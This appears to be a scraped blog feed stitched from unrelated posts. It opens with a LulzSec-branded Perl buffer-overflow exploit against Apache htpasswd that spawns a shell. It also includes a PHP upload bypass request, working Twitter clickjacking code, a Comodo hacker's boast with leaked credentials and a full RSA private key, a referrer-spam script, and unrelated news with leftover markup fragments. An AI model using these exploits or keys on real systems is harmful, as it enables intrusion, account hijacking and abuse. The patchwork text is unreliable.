You got here the code :)
RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
. /$$ /$$ /$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!
.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==y'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""bno,
. o O (_) (_) \ / _ AWAW/
. / _(+)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" === d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-""-.~~~~~~ .-""-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ V/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-""-.
. .-""-.___` -- \| -.__..-
Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!
===========================================
#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
]]>PHP 5.3.6 is vulnerable; other versions may also be affected.
Webmasters are advised to manually patch their PHP installations after a serious flaw allowing attackers to potentially delete files from their root directories was publicly disclosed.
The vulnerability lies in the « SAPI_POST_HANDLER_FUNC() » function in rfc1867.c and can be exploited to append forward or back slashes before the file name during an upload. This allows an attacker, for example, to delete files from the root directory or can be combined with other vulnerabilities to enhance attacks. The flaw is described as an input validation error and security bypass issue. Vulnerability research vendor Secunia rates it as « less critical. » A Polish web application developer named Krzysztof Kotowicz is credited with discovering and reporting the issue, but even though it was patched on June 12, details about the flaw have been available online since May 27.
The vulnerability, identified as CVE-2011-2202, affects PHP 5.3.6 and earlier versions. No new package has been released yet, but a patch can be grabbed from the repository and applied manually. The vulnerability does not require authentication, and has a partial impact on system integrity. System confidentiality are affected too.
It’s still unclear whether its access complexity should be low, as listed in an IBM XSS Force advisory, or high, as considered by the Red Hat security team.
Exploit found on pastebin.com
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=———-ThIs_Is_tHe_bouNdaRY_$
content-length: 200
————ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name= »contents »; filename= »/anything.here.slash-will-pass »;
Content-Type: text/plain
any
————ThIs_Is_tHe_bouNdaRY_$–
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}
A french pentester realeased a POC ( prooof of concept) of the vulnerabilty :
Here is how it’s work :
- You set the iframe fully transparent/invisible via CSS.
- You capture the mouse event.
- When the user move the mouse, you move the twitter button iframe in order it always stay under the cursor.
- If the user click somewhere on your page, he will automatcly follow your account.
Here is the code :
if (!document.getElementsByClassName){
document.getElementsByClassName = function(classname){
for (i=0; i < document.getElementsByTagName("*").length; i++)
{
if (document.getElementsByTagName("*").item(i).className == classname){
return new Array(document.getElementsByTagName("*").item(i));
}
}
}
}
var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
document.onmousemove = function(e){
if ( !e ) e = window.event;
twitterFollowIframe.style.left = e.clientX - 20;
twitterFollowIframe.style.top = e.clientY - 10;
}
You can find the proof of concept at this page : http://serphacker.com/twitter-follow-clickjacking.html
Destination server is down atm here are the POC source code with 20% of opacity:
]]>SERP Hacker
Tested on Firefox 3 and IE7Follow SERP Hacker
Just move the mouse and click somewhere, you will automatically follow my twitter account if you are already connected on twittR, remember we can make the button totally hidden by setting opacity 0.
« History will judge us. »
It is with these words that the Swedish Minister for the environment, Andreas Calgren, concluded this staged trial of humankind which was held in Stockholm on May 17, 2011 on the sidelines of the Nobel Prize’s third symposium for sustainable development. Twenty renowned scientists have been presented with this prestigious award.
The aim of this staged trial is to determine to what extent current generations have lost their relationship with the planet and how this relationship can be “restored” over the coming years. The aim is to rectify both the excesses of the past decades and lack of conscientiousness regarding these issues, encountered on an international level since the first world conference on climate change- held in Geneva in 1979.
However, this trial remains purely symbolic for these various specialists who have no legal standing, and in today’s comments made by Mario Molina-scientific adviser to Barack Obama, many cannot put forward anything but « a rational analysis and a demonstration of common sense ». The jury’s conclusions will aim primarily to develop a memorandum which will be given to a group within the United Nations that was put in place by its Secretary-General, Ban Ki Moon, for the forthcoming UN conference on sustainable development that is to be held in Rio de Janeiro in 2012.
Energy and more precisely the production of energy, remains to be a major stake in our future development according to the latest public report released by the IPCC (governmental group of climate change experts.) This report, released on the 9th May this year in Abu Dhabi portrayed as the most optimistic scenario, the fact that by 2050- 77% of global energy consumption may be gotten from renewable resources provided that appropriate public policies are implemented.
Thanks to Lilian Guyon for this article and his involvement in sustainable development.
We decided to pubish this article because the whole devquotes’s team believe in a green future and that kind of meeting HAS to be supported by YOU. Retweet this article as much as possible.
Here is the message from comodo hacker:
I, at first sight, tought it’s was a BIG fake. But that incredible guy with the highest ego i ever seen, really did it. I’m spreading here the rumors. Better for you to have your own advice :
———-
Hello
I’m writing this to the world, so you’ll know more about me..
At first I want to give some points, so you’ll be sure I’m the hacker: I hacked Comodo from InstantSSL.it, their CEO’s e-mail address [email protected]
Their Comodo username/password was: user: gtadmin password: [trimmed]
Their DB name was: globaltrust and instantsslcms
GlobalTrust.it had a dll called TrustDLL.dll for handling Comodo requests, they had resellers and their url was:
http://www.globaltrust.it/reseller_admin/
Enough said, huh? Yes, enough said, someone who should know already knows…Am I right Mr. Abdulhayoglu? Anyway, at first I should mention we have no relation to Iranian Cyber Army, we don’t change DNSes, we just hack and own.
I see Comodo CEO and others wrote that it was a managed attack, it was a planned attack, a group of cyber criminals did it, etc. etc. etc.
Let me explain:
a) I’m not a group of hacker, I’m single hacker with experience of 1000 hackers, I’m single programmer with experience of 1000 programmers, I’m single planner/project manager with experience of 1000 project managers, so you are right, it’s managed by a group of hackers, but it was only I with experience of 1000 h ackers.
b) It was not really a managed hack. At first I decided to hack RSA algorithm, I did too much investigation on SSL protocol, tried to find an algorithm for factoring integer, analyzed existing algorithms, for now I was not able to do so, at least not yet, but I know it’s not impossible and I’ll prove it, anyway… I saw that there is easier ways of doing it, like hacking a CA. I was looking to hack some CAs like Thawthe, Verisign, Comodo, etc. I found some small vulnerabilities in their servers, but it wasn’t enough to gain access to server and sign my CSRs. During my search about InstantSSL of Comodo which signs CSRs immediately I found InstantSSL.it which was doing it’s job under control of Comodo.
After a little try, I analyzed their web server and easily (easy for me, so hard for others) I got FULL access on the server, after a little investigation on their server, I found out that TrustDll.dll takes care of signing. It was coded in C# (ASP.NET). I decompiled the DLL and I found username/password of their GeoTrust and Comodo reseller account.
GeoTrust reseller URL was not working, it was in ADTP.cs. Then I found out their Comodo account works and Comodo URL is active. I logged into Comodo account and I saw I have right of signing using APIs. I had no idea of APIs and how it works. I wrote a code for signing my CSRs using POST request to those APIs, I learned their APIs so FAST and their TrustDLL.DLL was too old and was not working properly, it doesn’t send all needed parameters, it wasn’t enough for signing a CSR. As I said, I rewrote the code for !AutoApplySSL and !PickUpSSL APIs, first API returns OrderID of placed Order and second API returns entire signed certificate if you pass OrderID from previous call. I learned all these stuff, re-wrote the code and generated CSR for those sites all in about 10-15 minutes. I wasn’t ready for these type of APIs, these type of CSR generation, API calling, etc. But I did it very very fast.
Anyway, I know you are really shocked about my knowledge, my skill, my speed, my expertise and entire attack. That’s OK, all of it was so easy for me, I did more important things I can’t talk about, so if you have to worry, you can worry… I should mention my age is 21 .
Let’s back to reason of posting this message. I’m talking to the world, so listen carefully:
When USA and Israel creates Stuxnet, nobody talks about it, nobody blamed, nothing happened at all, so when I sign certificates nothing should happen, I say that, when I sign certificates nothing should happen. It’s a simple deal.
I heard that some stupids tried to ask about it from Iran’s ambassador in UN, really? How smartass you are?
Where were you when Stuxnet created by Israel and USA with millions of dollar budget, with access to SCADA systems and Nuclear softwares? Why no one asked a question from Israel and USA ambassador to UN? So you can’t ask about SSL situtation from my ambassador, I answer your question about situtation: « Ask about Stuxnet from USA and Israel », this is your answer, so don’t waste my Iran’s ambassador’s worthy time.
When USA and Isrel can read my emails in Yahoo, Hotmail, Skype, Gmail, etc. without any simple little problem, when they can spy using Echelon, I can do anything I can. It’s a simple rule. You do, I do, that’s all. You stop, I don’t stop. It’s a rule, rule #1 (My Rules as I rule to internet, you should know it already…)
Rule#2: So why all the world worried, internet shocked and all writers write about it, but nobody writes about Stuxnet anymore? Nobody writes about HAARP, nobody writes about Echelon… So nobody should write about SSL certificates.
Rule#3: Anyone inside Iran with problems, from fake green movement to all MKO members and two faced terrorists, should afraid of me personally. I won’t let anyone inside Iran, harm people of Iran, harm my country’s Nuclear Scientists, harm my Leader (which nobody can), harm my President, as I live, you won’t be able to do so. as I live, you don’t have privacy in internet, you don’t have security in digital world, just wait and see…By the way, you already have seen it or you are blind, is there any larger target than a CA in internet?
Rule#4: Comodo and other CAs in the world: Never think you are safe, never think you can rule the internet, ruling the world with a 256 digit number which nobody can find it’s 2 prime factors (you think so), I’ll show you how someone in my age can rule the digital world, how your assumptions are wrong, you already understood it, huh?
Rule#5: To microsoft, mozilla and chrome who updated their softwares as soon as instructions came from CIA. You are my targets too. Why Stuxnet’s Printer vulnerability patched after 2 years? Because it was needed in Stuxnet? So you’ll learn sometimes you have to close your eyes on some stuff in internet, you’ll learn… You’ll understand… I’ll bring equality in internet. My orders will equal to CIA orders, lol ;)
Rule#6: I’m a GHOST
Rule#7: I’m unstoppable, so afraid if you should afraid, worry if you should worry. My message to people who have problem with Islamic Republic of Iran, SSL and RSA certificates are broken, I did it one time, make sure I’ll do it again, but this time nobody will notice it. I see some people suggests using VPNs, some people suggests TOR, some other suggests UltraSurf, etc. Are you sure you are safe using those? RSA 2048 was not able to resist in front of me, do you think UltraSurf can? If you was doing a dirty business in internet inside Iran, I suggest you to quit your job, listen to sound of most of people of Iran, otherwise you’ll be in a big trouble, also you can leave digital world
and return to using abacus.
A message in Persian: Janam Fadaye Rahbar
Source : http://pastebin.com/74KXCaEZ
——————-
Some stupids in internet still cannot understand I’m behind the attack on SSL, talks about their small understandings about my hack and makes me nervous.
Why you can’t understand? What’s your problem? If you have Psychological or mental problems, don’t write your ideas in internet, just surf, ok?
Here is another proof:
http://rapidshare.com/files/454806052/GlobalTrustTable.rar
I uploaded JUST 1 table of their ENTIRE database which I own.
Also ask Comodo about my hack, ask them what I did to them. Let me tell you what I did:
I was logged in into their server via RDP (remote desktop), they detected me and via hardware firewall, they added allowed IP for RDP, so I was no longer able to login via RDP.
But I got UI control in their server just 2 days later, then I logged in via roberto franchini’s user/pass, then I formatted their external backup HDD, it was LG with backup of all files inside it. I formatted it.
Then I stopped IIS, deleted all logs, not normal delete which could be recovered with recovery tools, I deleted it with secure delete method and infact I wiped them.
Then I noticed another backup in another drive, I deleted ALL files of it with secure wiping method also and I left this session open with a notepad message in their desktop with this text: « SURPRISE! »
What more I should say?
Stop talking about who was behind it, it’s already proven.
Some people says, Microsoft wasn’t aware of issue to patch Printer vulnerability. It’s simply wrong, it was in a security magazine, you never saw this:
http://www.computerworld.com/s/article/9187300/Microsoft_confirms_it_missed_Stuxnet_print_spooler_zero_day_
Some others said I don’t know about RSA, it’s impossible to hack RSA, etc. etc. etc.
Never judge so fast, never write anything you think in your head in internet, most of my daily work focuses on encryption algorithms, differential cryptanalysis, inventing new methods of attacks on encryption algorithms, creating new secure encryption algorithms (symmetric and asymmetric), creating secure hash algorithm, I told you, I can’t talk about other things I did, I don’t see any use for it just giving away my work and causing more updates. So simply keep your mouth shut and wait. I already created my own encryption protocol, from asymmetric algorithm (for key exchange) to symmetric algorithm for encrypting data to my own hash algorithm to sign encrypted algorithms. You are so far from knowing about me…
Some others says APIs was easy, it was all documented, everything was inside DLL so what I did about re-writing APIs, a person with experience of 1000 programmers had problems with APIs, LOL.
Do you know how many codes I wrote in C++ and Assembly language? Do you know how much work I did in reversing Skype and it’s undisclosed protocol? Man! I create my own APIs, from web SOAP XML APIs to windows DLLs with exports.
I said I wasn’t aware of !ApplySSL API and other needed APIs like PickUpSSL and others.
I found that out when I was already logged into Comodo Partner’s account and I was sure they’ll notice me soon, so I had to do my job fast.
TrustDLL.dll was too old, it’s last modify date was end of 2007, APIs of Comodo was changed and a lot of more crucial parameters was added, they wasn’t using TrustDLL anymore, as far as I understood, they was doing processing and authenticating orders and signing CSRs manually. They had not too much order in last years, about 1 order per 4-5 days for example. So don’t worry, I’m aware of APIs ;)
Some other said I’m not religious, « Janam Fadaye Rahbar » is political, not religious, you are simply wrong. No need to explain more.
Some others said I said too much about myself and enjoyed myself too much, if you were did same thing, wouldn’t you enjoy like me? :))
Again my message to green movement (so little part of Iran) and two faced terrorists like MKO members inside Iran, never think UltraSurf, VPNs, SSLs, TOR will rescue you… My name will be your curse. You are all in a big trouble if you don’t exit your job. Don’t believe, try it. From now, just try it. Your friend will post about you in balatarin as you’ll not be able to do so after being caught.
Enough said, huh? Let’s think more before writing stuff…
Source : http://pastebin.com/CvGXyfiJ
—————————-
Comodo Hacker Released Mozilla Certificate
For some real dumbs, I bet they don’t have IQ above 75, WHO STILL thinks I’m not the hacker, here is mozilla addon’s certificate, check it’s serial with one published on all the internet:
http://www.multiupload.com/J9I8NFWPT0
I really worry about you guys (people who still have doubts) even for surfing in internet, have you ever visited a doctor?
Source : http://pastebin.com/X8znzPWH
—————————————-
Comodo Mozilla Private key
—–BEGIN RSA PRIVATE KEY—–
MIIEowIBAAKCAQEAq8ZtNvMVc3iDc850hdWu7LLw4CQfE4O4IKy7mv6Iu6uhHQsf
RQCqSbc1Nwxq70dMudG+41cSBI2Sx7bsAby22seBOCCtcoXmDvyBbAetaHY4xUTX
zMZKxZc+ZPRR5vB+suxW9yWCTUmYyxaY3SPxiZHRF5dAmSbW4qIrXt+9ifIbGlMt
zFBBetA9KgxVcBQB6VhJEHoLk4KL4R7tOoAQgs6WijTwzNfTubRQh1VUCbidQihV
AOWMNVS/3SWRRrcN5V2DqOWL+4TkPK522sRDK1t0C/i+XWjxeFu1zn3xXZlA2sru
OIFQvpihbLgkrfOvjA/XESgshBhMfbXZjzC1GwIDAQABAoIBAQCJoijaEXWLmvFA
thiZL7jEATCNd4PK4AyFacG8E9w8+uzR15qLcFgBTqF95R49cNSiQtP/VkGikkkc
ao25aprcu2PnNA+lpnHKajnM9G3WOHuOXHXIps08es3MmBKTxvjNph6cUlqQULrz
Zry+29DpmIN/snpY/EzLNIMptn4o6xnsjAIgJDpQfFKQztxdmZU6S6eVVn0mJ5cx
q+8TTjStaMbh+Yy73s+rcaCXzL7yqWDb1l5oQJ/DMYNfufY6lcLgZUMwFxYKjCFN
ScAPCiXFUKTzY3Hy1Z4tLndFxipyEPywDep1TB2nMb+F3OOXUs3z+kKVjGFaGnLZ
591n3x3hAoGBAOOgsb4QybjHh9+CxhUkfsqcztGGdaiI3U5R1qefXL7R47qCWfGc
FKdoJh3JwJzHEDX68ZmHz9dPhSXw6YrlLblCi6U/3g7BOMme5KRZKBTjHFo7O9II
B0laE5ISRH4OccsOC3XUf9XBkm8szzEBj95DgzB0QydPL4jp7NY0h0QrAoGBAMEv
jEFkr/JCRe2RWUSx/a1WT/DHnVLMnDb/FryN2M1fAerpMYNUc2rnndjp2cYbsGLs
cSF6Xecm3mUGqn8Y5r8QqBwxCp5OunCFCXEJvkiU3NSs8oskCsB8QJ6vk3qmauUK
jClX91heSCigwhC2t+1txnF290m/y0T46EfqOSrRAoGAUlyVk4D9jEdeCWiHBaVj
3ynnx3ZQYj/LW4hPE+2coErPjG+X3c0sx/nuOL8EW3XHjtCS1IuIj45tTfIifqg3
6B2E67D1Rv9w7br5XeIIl64pVxixp2hSQp8+D49eiwHs+JzHVsYhzxUwR9u9yCyZ
gsGI2WJn3fRP7ck+ca8l9msCgYB4B2Hec3+6RqEKBSfwvaI+44TRtkSyYDyjEwT+
bCeLGn+ng/Hmhj8b6gKx9kH/i86g+AUmZtAXQZgmLukaBM/BYMkCkxnk2EeQh6gh
Goumrw8x+K7N8rvXcpv3vGEmcGW0H0SMn4In3pR44cER/2Tx2SXV87Obl9Xk6b3w
iL+yMQKBgFjXcmiBW8lw3l2CaVckd/1SzrT80AfRpMT9vafurxe+iAhl9SDAdoZe
3RlshoItDQLW1ROlkLhM7Pdq/XZvLRm128hiIGKTDBnxtfN8TKAg+V7V+/TTfdqv
8jq7epvZsq5vjOC1FZh2gOhf50QwpqDJktjdyka1sPiBKQSoxfbZ
—–END RSA PRIVATE KEY—–
I’ll give you here some tips i used a loooong time ago. I used it to gather a maximum of fresh new content and backlinks. Let’s brain a little bit here.
It’s more a psychological trap for SEO admin checking stats x20 /day :)
Example
Let’s take an example, you are owner from a website directory dealing with pizzeria and you’re listing them into your website. For the example, we’ll choose « pizzeria-master-huge-directory.com » as name .
For the beginning you had created the content, scrapped manually google, searched different pizzerias in every cities you may know and you wrote 10 or 20 entries.
Now let’s think. The website is running, you got a correct position in SERP and you want to expand your visibility.
Here is the point: You want every pizzeria present on internet to come on your site, register themself and write BY HIMSELF an entry on your directory.
You would have fresh new content without doing anything.
But HOW TO DO THAT ?
Until you’re not ranking in the top #3, very few people will come and register by themselves.
Idea i had ( and i’m not the first), is to tell thoses pizzeria owner that you exist and your directory can bring them a little traffic.
Here come scripting :)
Don’t think about mail spam, it’s a waste of time. Noone cares about spams and it will be hard to get direct admin email.
Deep in SEO souls
Just remember how you were, what you did every day/week when you were a SEO beginner:
- go to google.com
- type analytics
- go to http://www.google.com/analytics/
- go to your website tab
- go to Overview Traffic Sources
- go to referrers
- check WHO IS INSANE ENOUGH TO LINK YOU !
Tricks is not to get in touch with admin website by mail, it is to set up a kind of trap. Just waiti for the webmaster to see « who is the website giving him SPECIALIZED traffic ». Don’t forget your victim own: « pizzeria-jose.com » and he is about to notice that « pizzeria-master-huge-directory.com » send him a little bit traffic.
As a SEO newbie, he’ll get on « pizzeria-master-huge-directory.com » and check the website, he’ll even try to understand « how the website sent me traffic » and he may finally regiser and create an entry on directory.
See what i mean ?
Time to setup the trap
Now remember what you did at the beginning and let’s automatize this part.
- go to google.com
- search localized pizzeria (ex: pizzeria paris, pizzeria new york, pizzeria london)
- go to found website and generate a hit on each of them using our pizzeria directory as referrer.
Trap is now set :D
You only have to wait for all those SEO rookies to check their analytics stats.
I didn’t measure the ROI of this trick, i think it totally depend on your business.
I just know that, this doesn’t cost a things to setup this trap and can bring you targeted webmaster who are potentially interested on subscribing on « pizzeria-master-huge-directory.com ».
Sources
function fake_referrer($url, $proxy = false) {
$ch = curl_init();
//set the url, number of POST vars, POST data
$userAgent='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)';
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT, $userAgent);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_REFERER, "http://www.pizzeria-master-huge-directory.com/");
$result = curl_exec($ch);
// echo curl_error($ch);
curl_close($ch);
return $result;
}
print_r($site_list);
foreach ($site_list as $ws) {
fake_referrer($ws);
}
I won’t give here the way to scrap google, it’s not the purpose of the topic. What you only need if to set your target list in the $site_list array.
I hope this article was helpfull. As always, if anything’s needed just ask in comment :)
]]>
You may have heard about a recent security hole in facebook.com (you know, the #2 website from Alexa ranks). French president Nicolas Sarkozy and Facebook’s CEO Mark Zuckerberg pages were recently hijacked.
How it works: hackers have used a cross site scripting vulnerability (XSS) for stealing cookie.
+
=
French security website zataz.com just realeased an article about the used method. A hacker used a fake identity: a certain Roy Castillo. The hackers used many identities but that « Roy » was the most influent one. As heard on Twitter and Zataz, hackers even bought domain fr-fr-facebook.net to convince people to enter their personnal information. Be carefull if that « Roy » or someone else you don’t know try to invite/contact you to join groups but all are hosted on infected page!
For information, this security hole has been publicly reported yesterday (26/01/11) and fixed this morning (27/01/11).
Here is a mirror of the facebook infected page with the effective XSS vulnerabilty.
If you think you have been compromised by the script, first of all clean your cookies and change your password. Facebook is trying to set up HTTPS access to its platform and is developping a system for avoiding strange account password recovery: « Social Authentification » : when you’ll reconnect after a suspicious move on your account, Facebook ask you to prove your identity by asking you to select friend from random picked pictures of them. If you don’t commit too much errors, you’ll be allowed to logon.
More infos/screenshots soon…
28/01/11 : Got some news .
Got sources Roy Castillo used :
little SEO news: Google is updating PR on all their DC (Data Center). Most of my own sites PR have changed. Can we tell this precious indicator is back?
« Precious » you said? Many people are saying they don’t care about PR. But difference between a PR1 page and PR5 is HUGE! No one cares but everyone wants one :)
For the moment, have a check on: http://www.seocentro.com/tools/search-engines/pagerank-dc.html (old tool but working tool).
Here is a list of working Google DC. Let us know about your PR update in the comments, do your sites have been granted?
The more testimonies we’ll have the better we’ll be able to discuss about.
]]>Rules have changed if you still want a Quora invitation:
- follow @devquotescom on twitter
- tweet: thanks @devquotescom for providing me a #Quora invitation – [YOUR EMAIL HERE],
- wait,
- enjoy Quora’s features!
- Expect some fresh new posts @devquotescom very soon.
Rentabiliweb is now allowed to propose transfer execution, standing orders and paiyement orders through credits cards.
In a close future, it plans to expand its services to bank withdrawals.
Remember that rentabiliweb is one of the biggest platform for website monetization
Rentabiliweb is also launching a drive to extend this accreditation in order to join the SWIFT network and handle debit and bank transfer operations without intermediaries
The firm announced the filing of several applications next passeporting European « free services », which means it may soon expand its services to other European countriesfor its future customers of e-commerce. All european country such as the United Kingdom and Belgium, but also in countries where e-commerce is still in development, such as Spain and Italy.
In that way, we should expect many changes in their upcoming e-commerce offers !
Let’s wait …